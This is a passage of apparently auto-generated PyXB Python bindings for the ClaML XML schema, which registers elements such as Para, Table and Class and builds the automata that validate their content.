Para = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4))
Namespace.addCategoryObject('elementBinding', Para.name().localName(), Para)
Include = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4))
Namespace.addCategoryObject('elementBinding', Include.name().localName(), Include)
IncludeDescendants = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), CTD_ANON_27, location=pyxb.utils.utility.Location('ClaML.xsd', 291, 4))
Namespace.addCategoryObject('elementBinding', IncludeDescendants.name().localName(), IncludeDescendants)
List = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4))
Namespace.addCategoryObject('elementBinding', List.name().localName(), List)
ListItem = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), CTD_ANON_29, location=pyxb.utils.utility.Location('ClaML.xsd', 305, 4))
Namespace.addCategoryObject('elementBinding', ListItem.name().localName(), ListItem)
Table = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4))
Namespace.addCategoryObject('elementBinding', Table.name().localName(), Table)
Caption = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Caption'), CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 328, 4))
Namespace.addCategoryObject('elementBinding', Caption.name().localName(), Caption)
THead = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'THead'), CTD_ANON_32, location=pyxb.utils.utility.Location('ClaML.xsd', 334, 4))
Namespace.addCategoryObject('elementBinding', THead.name().localName(), THead)
TBody = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TBody'), CTD_ANON_33, location=pyxb.utils.utility.Location('ClaML.xsd', 342, 4))
Namespace.addCategoryObject('elementBinding', TBody.name().localName(), TBody)
TFoot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), CTD_ANON_34, location=pyxb.utils.utility.Location('ClaML.xsd', 350, 4))
Namespace.addCategoryObject('elementBinding', TFoot.name().localName(), TFoot)
Row = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4))
Namespace.addCategoryObject('elementBinding', Row.name().localName(), Row)
Cell = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Cell'), CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 366, 4))
Namespace.addCategoryObject('elementBinding', Cell.name().localName(), Cell)
Term = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4))
Namespace.addCategoryObject('elementBinding', Term.name().localName(), Term)
RubricKind = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), CTD_ANON_38, location=pyxb.utils.utility.Location('ClaML.xsd', 114, 4))
Namespace.addCategoryObject('elementBinding', RubricKind.name().localName(), RubricKind)
ModifiedBy = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 186, 4))
Namespace.addCategoryObject('elementBinding', ModifiedBy.name().localName(), ModifiedBy)
Fragment = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 270, 4))
Namespace.addCategoryObject('elementBinding', Fragment.name().localName(), Fragment)
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variants'), CTD_ANON_, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 41, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), CTD_ANON_4, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 60, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Title'), CTD_ANON_5, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 66, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Authors'), CTD_ANON_6, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 73, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), CTD_ANON_8, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 85, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), CTD_ANON_9, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 92, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), CTD_ANON_10, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 99, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), CTD_ANON_14, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 142, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), CTD_ANON_15, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 154, 4)))
CTD_ANON._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Class'), CTD_ANON_16, scope=CTD_ANON, location=pyxb.utils.utility.Location('ClaML.xsd', 169, 4)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 26, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 27, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 29, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 30, 16))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 32, 16))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 34, 16))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 35, 16))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 36, 16))
counters.add(cc_7)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 26, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Identifier')), pyxb.utils.utility.Location('ClaML.xsd', 27, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Title')), pyxb.utils.utility.Location('ClaML.xsd', 28, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Authors')), pyxb.utils.utility.Location('ClaML.xsd', 29, 16))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Variants')), pyxb.utils.utility.Location('ClaML.xsd', 30, 16))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds')), pyxb.utils.utility.Location('ClaML.xsd', 31, 16))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds')), pyxb.utils.utility.Location('ClaML.xsd', 32, 16))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds')), pyxb.utils.utility.Location('ClaML.xsd', 33, 16))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Modifier')), pyxb.utils.utility.Location('ClaML.xsd', 34, 16))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass')), pyxb.utils.utility.Location('ClaML.xsd', 35, 16))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Class')), pyxb.utils.utility.Location('ClaML.xsd', 36, 16))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, True) ]))
st_10._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variant'), CTD_ANON_2, scope=CTD_ANON_, location=pyxb.utils.utility.Location('ClaML.xsd', 48, 4)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Variant')), pyxb.utils.utility.Location('ClaML.xsd', 44, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_2._Automaton = _BuildAutomaton_2()
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_3()
CTD_ANON_6._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Author'), CTD_ANON_7, scope=CTD_ANON_6, location=pyxb.utils.utility.Location('ClaML.xsd', 80, 4)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 76, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_6._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Author')), pyxb.utils.utility.Location('ClaML.xsd', 76, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_6._Automaton = _BuildAutomaton_4()
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_7._Automaton = _BuildAutomaton_5()
CTD_ANON_8._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), CTD_ANON_11, scope=CTD_ANON_8, location=pyxb.utils.utility.Location('ClaML.xsd', 106, 4)))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_8._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ClassKind')), pyxb.utils.utility.Location('ClaML.xsd', 88, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_8._Automaton = _BuildAutomaton_6()
CTD_ANON_9._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), CTD_ANON_38, scope=CTD_ANON_9, location=pyxb.utils.utility.Location('ClaML.xsd', 114, 4)))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_9._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RubricKind')), pyxb.utils.utility.Location('ClaML.xsd', 95, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_9._Automaton = _BuildAutomaton_7()
CTD_ANON_10._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), CTD_ANON_12, scope=CTD_ANON_10, location=pyxb.utils.utility.Location('ClaML.xsd', 130, 4)))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_10._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'UsageKind')), pyxb.utils.utility.Location('ClaML.xsd', 102, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_10._Automaton = _BuildAutomaton_8()
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4)))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 109, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_11._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Display')), pyxb.utils.utility.Location('ClaML.xsd', 109, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_11._Automaton = _BuildAutomaton_9()
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_13._Automaton = _BuildAutomaton_10()
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 145, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 146, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 147, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 148, 16))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 145, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 146, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 147, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 148, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_14._Automaton = _BuildAutomaton_11()
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 157, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 159, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 160, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 161, 16))
counters.add(cc_3)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 157, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SuperClass')), pyxb.utils.utility.Location('ClaML.xsd', 158, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 159, 16))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 160, 16))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 161, 16))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_15._Automaton = _BuildAutomaton_12()
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), CTD_ANON_39, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 186, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), CTD_ANON_17, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 205, 4)))
